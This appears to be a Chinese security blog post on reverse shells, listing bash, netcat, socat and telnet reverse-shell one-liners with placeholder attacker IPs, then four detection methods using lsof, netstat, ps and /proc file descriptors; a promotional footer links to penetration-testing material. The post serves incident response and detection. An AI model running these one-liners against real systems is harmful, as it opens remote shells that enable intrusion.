反弹shell与检测方法
2022-9-12 10:46:36 Author: 渗透安全团队(查看原文) 阅读量:12 收藏

点击蓝字 关注我们

前言

在渗透测试的时候,我们经常会用到反弹shell,去进行一个后续的利用,今天在防守的角度,去查看一下如何分析反弹shell的检测,在应急响应,分析攻击手法的时候,也会使用到。

正文

先来列举一下反弹shell的各种形式。

bash反弹shell

bash -i >& /dev/tcp/xxx.xxx.xxx.xxxx/xxx 0>&1

netcat反弹shell

netcat xx.xxx.xxx.x xxxx -e /bin/bash# nc <攻击机IP> <攻击机监听的端口> -e /bin/bash

Socat反弹shell

socat tcp-connect:xxx.xxx.xxx.xxx:xxxx exec:'bash -li',pty,stderr,setsid,sigint,sane

telnet反弹shell

telnet xx.xxx.xxx.xxx xxxx | /bin/bash | telnet xxx.xx.xxx.xxx xxxx

关于反弹shell的方式还是有很多的,这里不列举过多。

第一种检测的方式:

通过lsof进行检测

lsof -n | grep ESTABLISHED |grep -E '0u|1u|2u'

反弹SHELL的本质就是0 1 2文件描述符的重定向,因此检测0 1 2文件描述符有没有重定向到远端地址就可以大致判断是否使用了反弹SHELL

第二种检测方式:

netstat -anop  |grep ESTABLISHED

这里是查看有无bash/sh连接到远端地址

第三种检测方法,直接通过ps -ef,查看有无反弹shell的常见命令。

第四种检测方式,通过ls -al /proc/xxx/fd,通过查看fd,有无连接到远端地址,这里有些时候会用到pipe来执行命令,需要继续跟踪pipe.

免责声明
由于传播、利用本公众号渗透安全团队所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号渗透安全团队及作者不为承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!

星球的最近主题和星球内部工具一些展示

欢迎加入星球!

关 注 有 礼

关注下方公众号回复“666”可以领取一套精品渗透测试工具集和百度云视频链接。

 还在等什么?赶紧点击下方名片关注学习吧!


群聊 | 技术交流群-群除我佬

干货|史上最全一句话木马

干货 | CS绕过vultr特征检测修改算法

实战 | 用中国人写的红队服务器搞一次内网穿透练习

实战 | 渗透某培训平台经历

实战 | 一次曲折的钓鱼溯源反制

好文分享收藏赞一下最美点在看哦

文章来源: http://mp.weixin.qq.com/s?__biz=MzkxNDAyNTY2NA==&mid=2247492347&idx=2&sn=968bfd4c1e04cd53360c3eaed3c50242&chksm=c1761f54f60196424b73ffffa5faa16f0da1161e7ea200fe83429a0910c6cd5b7979cc6d60a3#rd
如有侵权请联系:admin#unsafe.sh